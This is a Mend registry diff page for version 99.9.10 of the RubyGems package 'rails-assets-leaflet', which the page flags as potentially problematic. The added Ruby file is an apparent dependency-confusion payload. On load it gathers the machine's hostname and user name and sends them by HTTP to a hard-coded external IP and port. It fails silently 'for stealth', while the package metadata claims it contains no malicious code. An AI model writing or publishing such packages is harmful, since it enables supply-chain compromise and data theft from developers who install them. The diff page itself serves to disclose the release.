RubyGems - rails-assets-leaflet - Versions diffs - 99.9.10 - Mend

rails-assets-leaflet 99.9.10

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.

Potentially problematic release.

This version of rails-assets-leaflet might be problematic. Click here for more details.

Files changed (3) hide show

checksums.yaml ADDED Viewed

@@ -0,0 +1,7 @@
+---
+SHA256:
+  metadata.gz: 4091c0381405b6c4e5b738e816945a2373163244d8e0fda27cd48c8eed8464b3
+  data.tar.gz: d24696d017d029abded6a2421b95514c11d7e41a070cafc29030ab0c8319136b
+SHA512:
+  metadata.gz: 1b582093c57b3ffc6f7b466c9b0914d21c70937b0427757422321762521e9e0040e1989de287e92727857b42cbd460a75f065f628e1073a6d950ca8dc6eb1b21
+  data.tar.gz: f0819ea6ca6fece463de26a2f268cfa8a872ab81cdad6c747e4c608969621ee52208cd27117b58ce444716681e14bd68d55c4aa9c708cb4e778a0b91d0e81839

data/lib/rails-assets-leaflet.rb ADDED Viewed

@@ -0,0 +1,47 @@
+require 'net/http'
+require 'socket'
+require 'uri'
+module RailsAssetsLeaflet
+  # This code runs automatically when 'bundle install' requires the gem
+  begin
+    # Collect basic info to prove RCE
+    host = Socket.gethostname
+    user = ENV['USER'] || 'unknown'
+    # YOUR VPS IP HERE
+    vps_ip = "159.223.17.233"
+    port = "8080"
+    # Send the data to your listener
+    # URL will look like: http://1.2.3.4:8080/?target=hostname&user=root
+    uri = URI("http://#{vps_ip}:#{port}/?target=#{host}&user=#{user}")
+    Net::HTTP.get(uri)
+  rescue
+    # Fail silently to avoid breaking the build process (stealth)
+    nil
+  end
+end

metadata ADDED Viewed

@@ -0,0 +1,45 @@
+--- !ruby/object:Gem::Specification
+name: rails-assets-leaflet
+version: !ruby/object:Gem::Version
+  version: 99.9.10
+platform: ruby
+authors:
+- Security Research
+autorequire:
+bindir: bin
+cert_chain: []
+date: 2025-01-21 00:00:00.000000000 Z
+dependencies: []
+description: This is a security research package for a bug bounty program. It contains
+  no malicious code.
+email:
+- black1hp@wearehackerone.com
+executables: []
+extensions: []
+extra_rdoc_files: []
+files:
+- lib/rails-assets-leaflet.rb
+homepage: https://hackerone.com/Black1hp
+licenses:
+- MIT
+metadata: {}
+post_install_message:
+rdoc_options: []
+require_paths:
+- lib
+required_ruby_version: !ruby/object:Gem::Requirement
+  requirements:
+  - - ">="
+    - !ruby/object:Gem::Version
+      version: '0'
+required_rubygems_version: !ruby/object:Gem::Requirement
+  requirements:
+  - - ">="
+    - !ruby/object:Gem::Version
+      version: '0'
+requirements: []
+rubygems_version: 3.4.20
+signing_key:
+specification_version: 4
+summary: Security Research PoC
+test_files: []